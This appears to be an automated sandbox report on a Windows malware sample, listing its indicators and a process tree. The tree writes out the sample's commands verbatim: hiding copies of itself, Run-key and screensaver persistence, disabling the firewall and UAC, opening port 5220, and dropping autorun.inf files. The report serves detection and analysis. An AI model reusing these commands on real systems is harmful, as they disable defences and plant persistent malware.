640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4048	vbc.exe
Token: SeSecurityPrivilege	4048	vbc.exe
Token: SeTakeOwnershipPrivilege	4048	vbc.exe
Token: SeLoadDriverPrivilege	4048	vbc.exe
Token: SeSystemProfilePrivilege	4048	vbc.exe
Token: SeSystemtimePrivilege	4048	vbc.exe
Token: SeProfSingleProcessPrivilege	4048	vbc.exe
Token: SeIncBasePriorityPrivilege	4048	vbc.exe
Token: SeCreatePagefilePrivilege	4048	vbc.exe
Token: SeBackupPrivilege	4048	vbc.exe
Token: SeRestorePrivilege	4048	vbc.exe
Token: SeShutdownPrivilege	4048	vbc.exe
Token: SeDebugPrivilege	4048	vbc.exe
Token: SeSystemEnvironmentPrivilege	4048	vbc.exe
Token: SeChangeNotifyPrivilege	4048	vbc.exe
Token: SeRemoteShutdownPrivilege	4048	vbc.exe
Token: SeUndockPrivilege	4048	vbc.exe
Token: SeManageVolumePrivilege	4048	vbc.exe
Token: SeImpersonatePrivilege	4048	vbc.exe
Token: SeCreateGlobalPrivilege	4048	vbc.exe
Token: 33	4048	vbc.exe
Token: 34	4048	vbc.exe
Token: 35	4048	vbc.exe
Token: 36	4048	vbc.exe
Token: SeShutdownPrivilege	4684	unregmp2.exe
Token: SeCreatePagefilePrivilege	4684	unregmp2.exe
Token: SeShutdownPrivilege	736	wmplayer.exe
Token: SeCreatePagefilePrivilege	736	wmplayer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4048	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 640 wrote to memory of 3872	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	86
PID 640 wrote to memory of 3872	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	86
PID 640 wrote to memory of 3872	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	86
PID 3872 wrote to memory of 3696	3872	cmd.exe	89
PID 3872 wrote to memory of 3696	3872	cmd.exe	89
PID 3872 wrote to memory of 3696	3872	cmd.exe	89
PID 640 wrote to memory of 4532	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	92
PID 640 wrote to memory of 4532	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	92
PID 640 wrote to memory of 4532	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	92
PID 640 wrote to memory of 2472	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	94
PID 640 wrote to memory of 2472	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	94
PID 640 wrote to memory of 2472	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	94
PID 640 wrote to memory of 968	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	96
PID 640 wrote to memory of 968	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	96
PID 640 wrote to memory of 968	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	96
PID 640 wrote to memory of 3436	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	98
PID 640 wrote to memory of 3436	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	98
PID 640 wrote to memory of 3436	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	98
PID 2472 wrote to memory of 3028	2472	cmd.exe	100
PID 2472 wrote to memory of 3028	2472	cmd.exe	100
PID 2472 wrote to memory of 3028	2472	cmd.exe	100
PID 968 wrote to memory of 2696	968	cmd.exe	101
PID 968 wrote to memory of 2696	968	cmd.exe	101
PID 968 wrote to memory of 2696	968	cmd.exe	101
PID 3436 wrote to memory of 2684	3436	cmd.exe	102
PID 3436 wrote to memory of 2684	3436	cmd.exe	102
PID 3436 wrote to memory of 2684	3436	cmd.exe	102
PID 640 wrote to memory of 2524	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	103
PID 640 wrote to memory of 2524	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	103
PID 640 wrote to memory of 2524	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	103
PID 640 wrote to memory of 4868	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	107
PID 640 wrote to memory of 4868	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	107
PID 640 wrote to memory of 4868	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	107
PID 640 wrote to memory of 4564	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	109
PID 640 wrote to memory of 4564	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	109
PID 640 wrote to memory of 4564	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	109
PID 4868 wrote to memory of 3312	4868	cmd.exe	111
PID 4868 wrote to memory of 3312	4868	cmd.exe	111
PID 4868 wrote to memory of 3312	4868	cmd.exe	111
PID 640 wrote to memory of 3592	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	112
PID 640 wrote to memory of 3592	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	112
PID 640 wrote to memory of 3592	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	112
PID 3592 wrote to memory of 1052	3592	cmd.exe	114
PID 3592 wrote to memory of 1052	3592	cmd.exe	114
PID 3592 wrote to memory of 1052	3592	cmd.exe	114
PID 640 wrote to memory of 2316	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	117
PID 640 wrote to memory of 2316	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	117
PID 640 wrote to memory of 2316	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	117
PID 640 wrote to memory of 1604	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	119
PID 640 wrote to memory of 1604	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	119
PID 640 wrote to memory of 1604	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	119
PID 640 wrote to memory of 1496	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	121
PID 640 wrote to memory of 1496	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	121
PID 640 wrote to memory of 1496	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	121
PID 640 wrote to memory of 1324	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	123
PID 640 wrote to memory of 1324	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	123
PID 640 wrote to memory of 1324	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	123
PID 640 wrote to memory of 2832	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	125
PID 640 wrote to memory of 2832	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	125
PID 640 wrote to memory of 2832	640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe	125
PID 1604 wrote to memory of 1776	1604	cmd.exe	127
PID 1604 wrote to memory of 1776	1604	cmd.exe	127
PID 1604 wrote to memory of 1776	1604	cmd.exe	127
PID 1324 wrote to memory of 2160	1324	cmd.exe	128

Views/modifies file attributes 1 TTPs 18 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3872	attrib.exe
3092	attrib.exe
1524	attrib.exe
2684	attrib.exe
3312	attrib.exe
624	attrib.exe
1400	attrib.exe
1396	attrib.exe
3696	attrib.exe
1588	attrib.exe
3460	attrib.exe
3660	attrib.exe
1240	attrib.exe
2524	attrib.exe
3028	attrib.exe
1052	attrib.exe
1776	attrib.exe
4320	attrib.exe

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\nvidgfx.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3872
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - Views/modifies file attributes
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "%temp%\nvidgfx.exe" "%appdata%\nvidgfx.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\nvidgfx.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "nvidgfx" /t REG_SZ /d "%appdata%\nvidgfx.exe" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "nvidgfx" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nvidgfx.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\atlsyn.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3436
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Windows\system32\atlsyn.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2684
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "%temp%\nvidgfx.exe" "%windir%\system32\atlsyn.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\atlsyn.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Windows\system32\atlsyn.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
  2⤵
  PID:4564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\spacedots.scr"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spacedots.scr"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "%temp%\nvidgfx.exe" "%appdata%\Microsoft\Windows\spacedots.scr"
  2⤵
  PID:2316
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\spacedots.scr"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spacedots.scr"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\spacedots.scr" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1496
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spacedots.scr" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
    3⤵
    PID:2240
- C:\Users\Admin\AppData\Roaming\errorreporter.exe
  "C:\Users\Admin\AppData\Roaming\errorreporter.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:736
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4048
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" +s +h
      4⤵
      PID:3412
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" +s +h
        5⤵
        Sets file to hidden
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\Microsoft.NET\Framework\v2.0.50727" +s +h
      4⤵
      System Location Discovery: System Language Discovery
      PID:888
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\Microsoft.NET\Framework\v2.0.50727" +s +h
        5⤵
        Sets file to hidden
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:624
  - - C:\Windows\SysWOW64\notepad.exe
      notepad
      4⤵
      System Location Discovery: System Language Discovery
      PID:840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCR\.zip\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3872
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCR\.zip\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
    3⤵
    - Modifies registry class
    PID:4412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCR\.zip\CompressedFolder\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3032
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCR\.zip\CompressedFolder\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:4560
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCR\.rar\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCR\.rar\ShellNew" /v "FileName" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\newzip.dat" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\plugininstall.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3440
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe" "winhttpsvc" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:220
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="winhttpsvc" profile=public dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3092
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 5220 "Open Port 5220"
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2960
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Open Port 5220" profile=public dir=in action=allow protocol=TCP localport=5220
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3612
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode DISABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:920
- - C:\Windows\SysWOW64\sc.exe
    sc config upnphost start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2020
- - C:\Windows\SysWOW64\sc.exe
    sc config SSDPSRV start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4312
- - C:\Windows\SysWOW64\sc.exe
    sc config browser start= auto
    3⤵
    - Launches sc.exe
    PID:1496
- - C:\Windows\SysWOW64\net.exe
    net start seclogon
    3⤵
    PID:4864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start seclogon
      4⤵
      System Location Discovery: System Language Discovery
      PID:4840
- - C:\Windows\SysWOW64\net.exe
    net start upnphost
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start upnphost
      4⤵
      System Location Discovery: System Language Discovery
      PID:1500
- - C:\Windows\SysWOW64\net.exe
    net start SSDPSRV
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SSDPSRV
      4⤵
      System Location Discovery: System Language Discovery
      PID:2284
- - C:\Windows\SysWOW64\net.exe
    net start browser
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start browser
      4⤵
      System Location Discovery: System Language Discovery
      PID:3332
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2416
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2988
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    PID:1924
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:1080
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2164
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Internet Explorer settings
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3040
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:4828
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1856
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:556
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2836
- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
  "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
  2⤵
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  PID:736
- - C:\Windows\SysWOW64\unregmp2.exe
    "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1052
  - - C:\Windows\system32\unregmp2.exe
      "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
      4⤵
      Enumerates connected drives
      Suspicious use of AdjustPrivilegeToken
      PID:4684
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1460
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe"
  2⤵
  PID:1236
- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
  "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4876
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3048
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4952
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H "C:\autorun.inf"
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:4320
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4984
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H "F:\autorun.inf"
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H "F:\protect.bat"
    3⤵
    - Views/modifies file attributes
    PID:3460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
  2⤵
  PID:3712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H "C:\protect.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3660
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2196
- - C:\Windows\SysWOW64\attrib.exe
    attrib -S -R -H "C:\Users\Admin\AppData\Roaming\nvidgfx.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
